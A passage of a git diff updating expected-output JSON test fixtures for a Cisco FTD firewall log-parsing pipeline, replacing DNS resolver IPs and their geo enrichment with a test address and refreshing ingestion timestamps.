"code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -1878,7 +1914,7 @@ "dns_query": "laskdfjlaksdf.elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "9.9.9.9", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -1921,23 +1957,26 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "France", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 19281, + "number": 20712, "organization": { - "name": "Quad9" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "9.9.9.9", + "address": "81.2.69.144", "port": 53, "bytes": 108, - "ip": "9.9.9.9", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -1985,7 +2024,7 @@ ], "ip": [ "10.0.1.20", - "9.9.9.9" + "81.2.69.144" ] }, "host": { @@ -1994,8 +2033,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350971800Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694", + "ingested": "2021-12-09T13:35:02.913029600Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2025,7 +2064,7 @@ "dns_query": "ns-1168.awsdns-18.org", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "9.9.9.9", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -2067,23 +2106,26 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "France", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 19281, + "number": 20712, "organization": { - "name": "Quad9" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "9.9.9.9", + "address": "81.2.69.144", "port": 53, "bytes": 162, - "ip": "9.9.9.9", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2131,7 +2173,7 @@ ], "ip": [ "10.0.1.20", - "9.9.9.9" + "81.2.69.144" ] }, "host": { @@ -2140,8 +2182,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350974400Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946", + "ingested": "2021-12-09T13:35:02.913034500Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2171,7 +2213,7 @@ "dns_query": "_http._tcp.security.ubuntu.com", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "9.9.9.9", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -2213,24 +2255,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 199, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2278,7 +2323,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -2287,8 +2332,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350977Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", + "ingested": "2021-12-09T13:35:02.913040500Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2319,7 +2364,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -2361,24 +2406,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2426,7 +2474,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -2435,8 +2483,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350979500Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", + "ingested": "2021-12-09T13:35:02.913045Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2466,7 +2514,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -2507,24 +2555,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2572,7 +2623,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -2581,8 +2632,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350982Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", + "ingested": "2021-12-09T13:35:02.913049600Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2612,7 +2663,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -2653,24 +2704,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 221, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2718,7 +2772,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -2727,8 +2781,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350984400Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", + "ingested": "2021-12-09T13:35:02.913053300Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2758,7 +2812,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -2798,24 +2852,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 131, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2863,7 +2920,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -2872,8 +2929,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350987100Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59", + "ingested": "2021-12-09T13:35:02.913058Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2906,7 +2963,7 @@ "prefilter_policy": "Default Prefilter Policy", "nap_policy": "Balanced Security and Connectivity", "ingress_zone": "input-zone", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_port": "46093", "src_ip": "10.0.1.20", @@ -2943,24 +3000,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 722, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -3008,7 +3068,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -3017,8 +3077,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350989500Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", + "ingested": "2021-12-09T13:35:02.913064400Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -3049,7 +3109,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json index 41acde1f765..4253c442cad 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json @@ -31,7 +31,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.328928600Z", + "ingested": "2021-12-09T13:35:07.406347800Z", "original": "Jan 1 2019 01:00:27 beats asa[1234]: %FTD-7-999999: This message is not filtered.", "code": "999999", "kind": "event", @@ -72,7 +72,7 @@ }, "event": { "severity": 8, - "ingested": "2021-09-07T12:21:59.328938100Z", + "ingested": "2021-12-09T13:35:07.406356100Z", "original": "Jan 1 2019 01:00:30 beats asa[1234]: %FTD-8-999999: This phony message is dropped due to log level.", "code": "999999", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json index edc54add973..01f60058c6a 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json @@ -29,7 +29,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441041500Z", + "ingested": "2021-12-09T13:35:07.581578300Z", "original": "\u003c14\u003eAug 14 2019 13:56:30 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00", "code": "" }, @@ -66,7 +66,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441051800Z", + "ingested": "2021-12-09T13:35:07.581586900Z", "original": "\u003c14\u003eAug 14 2019 13:57:19 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=Banner, Page View\u0000x0a\u0000x00", "code": "" }, @@ -103,7 +103,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441054Z", + "ingested": "2021-12-09T13:35:07.581591600Z", "original": "\u003c14\u003eAug 14 2019 13:57:26 ChangeReconciliation.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/ChangeReconciliation.cgi, Page View\u0000x0a\u0000x00", "code": "" }, @@ -140,7 +140,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441056800Z", + "ingested": "2021-12-09T13:35:07.581595700Z", "original": "\u003c14\u003eAug 14 2019 13:57:34 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=IntrusionPolicyPrefs, Page View\u0000x0a\u0000x00", "code": "" }, @@ -177,7 +177,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441058800Z", + "ingested": "2021-12-09T13:35:07.581600100Z", "original": "\u003c14\u003eAug 14 2019 13:57:43 lights_out_mgmt.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /admin/lights_out_mgmt.cgi, Page View\u0000x0a\u0000x00", "code": "" }, @@ -214,7 +214,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441080100Z", + "ingested": "2021-12-09T13:35:07.581604700Z", "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View url filtering settings\u0000x0a\u0000x00", "code": "" }, @@ -251,7 +251,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441084200Z", + "ingested": "2021-12-09T13:35:07.581609600Z", "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View amp settings\u0000x0a\u0000x00", "code": "" }, @@ -288,7 +288,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441086400Z", + "ingested": "2021-12-09T13:35:07.581615400Z", "original": "\u003c14\u003eAug 14 2019 13:58:20 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00", "code": "" }, @@ -325,7 +325,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441088200Z", + "ingested": "2021-12-09T13:35:07.581621Z", "original": "\u003c14\u003eAug 14 2019 13:58:41 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management, Page View\u0000x0a\u0000x00", "code": "" }, @@ -362,7 +362,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441090100Z", + "ingested": "2021-12-09T13:35:07.581626600Z", "original": "\u003c14\u003eAug 14 2019 13:58:47 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Interfaces, Page View\u0000x0a\u0000x00", "code": "" }, @@ -399,7 +399,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441091900Z", + "ingested": "2021-12-09T13:35:07.581632200Z", "original": "\u003c14\u003eAug 14 2019 13:58:52 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00", "code": "" }, @@ -436,7 +436,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441093900Z", + "ingested": "2021-12-09T13:35:07.581638200Z", "original": "\u003c14\u003eAug 14 2019 13:58:54 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00", "code": "" }, @@ -473,7 +473,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441095700Z", + "ingested": "2021-12-09T13:35:07.581643900Z", "original": "\u003c14\u003eAug 14 2019 13:59:10 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings, Page View\u0000x0a\u0000x00", "code": "" }, @@ -510,7 +510,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441097500Z", + "ingested": "2021-12-09T13:35:07.581649600Z", "original": "\u003c14\u003eAug 14 2019 13:59:15 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, @@ -547,7 +547,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441099400Z", + "ingested": "2021-12-09T13:35:07.581655100Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00", "code": "" }, @@ -584,7 +584,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441101100Z", + "ingested": "2021-12-09T13:35:07.581660800Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00", "code": "" }, @@ -621,7 +621,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441103Z", + "ingested": "2021-12-09T13:35:07.581666600Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: 